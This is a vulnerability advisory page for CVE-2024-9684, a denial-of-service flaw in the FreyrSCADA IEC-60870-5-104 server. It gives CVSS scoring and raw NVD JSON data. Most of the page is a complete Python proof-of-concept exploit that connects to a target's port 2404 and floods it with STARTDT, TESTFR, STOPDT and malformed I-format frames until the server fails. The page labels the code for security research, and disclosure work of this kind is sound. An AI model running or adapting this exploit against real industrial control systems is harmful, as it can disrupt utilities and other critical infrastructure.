Security Vulnerability Report
CVE-2024-9684 CVSS 7.5 HIGH

Published: 2025-12-23 15:15:44
Last Modified: 2026-04-15 00:35:42

Description

FreyrSCADA/IEC-60870-5-104 server v21.06.008 allows remote attackers to cause a denial of service by sending specific message sequences.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

No configuration data available.

FreyrSCADA/IEC-60870-5-104 Server v21.06.008

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2024-9684 PoC - FreyrSCADA/IEC-60870-5-104 Server DoS
Reference: https://github.com/FreyrSCADA/IEC-60870-5-104/issues/6
"""

import socket
import struct
import time


def create_iec104_u_format(control_field):
    """Create IEC 60870-5-104 U-Format (Unnumbered Control Functions)"""
    # U-Format: Start Byte (0x68) + Length (0x04) + 4 bytes control field
    return b'\x68\x04' + control_field


def send_malformed_sequence(target_ip, target_port=2404):
    """
    Send malformed message sequences to trigger DoS condition
    """
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(10)
        sock.connect((target_ip, target_port))
        print(f"[*] Connected to {target_ip}:{target_port}")

        # STARTDT ACT (Start Data Transfer - Activation)
        startdt_act = create_iec104_u_format(b'\x07\x00\x00\x00')
        sock.send(startdt_act)
        print("[*] Sent STARTDT_ACT")
        time.sleep(0.5)

        # Send malformed TESTFR sequences
        testfr_act = create_iec104_u_format(b'\x43\x00\x00\x00')
        for i in range(100):
            sock.send(testfr_act)
            time.sleep(0.01)
        print(f"[*] Sent {100} malformed TESTFR_ACT messages")

        # STOPDT ACT sequence
        stopdt_act = create_iec104_u_format(b'\x13\x00\x00\x00')
        sock.send(stopdt_act)
        print("[*] Sent STOPDT_ACT")
        time.sleep(0.5)

        # Send invalid I-Format (Information Transfer) messages
        # I-Format: Start Byte + Length + COT + CA + IOA
        for i in range(50):
            malformed_iframe = b'\x68\x0E' + struct.pack('>H', i) + b'\x00\x00\x03\x01\x00\x00\x00\x00\xFF\xFF\xFF\xFF'
            sock.send(malformed_iframe)
            time.sleep(0.01)
        print(f"[*] Sent {50} malformed I-Format messages")

        sock.close()
        print("[+] Attack completed")
        return True
    except Exception as e:
        print(f"[-] Error: {e}")
        return False


if __name__ == "__main__":
    import sys
    if len(sys.argv) < 2:
        print(f"Usage: {sys.argv[0]} <target_ip>")
        sys.exit(1)
    target = sys.argv[1]
    send_malformed_sequence(target)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2024-9684", "sourceIdentifier": "[email protected]", "published": "2025-12-23T15:15:44.083", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "FreyrSCADA/IEC-60870-5-104 server v21.06.008 allows remote attackers to cause a denial of service by sending specific message sequences."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-119"}]}], "references": [{"url": "https://drive.google.com/drive/folders/1pBPZR59d_rlixH7ZysUmmbOEZvjZV9g1", "source": "[email protected]"}, {"url": "https://github.com/FreyrSCADA/IEC-60870-5-104/issues/6", "source": "[email protected]"}]}}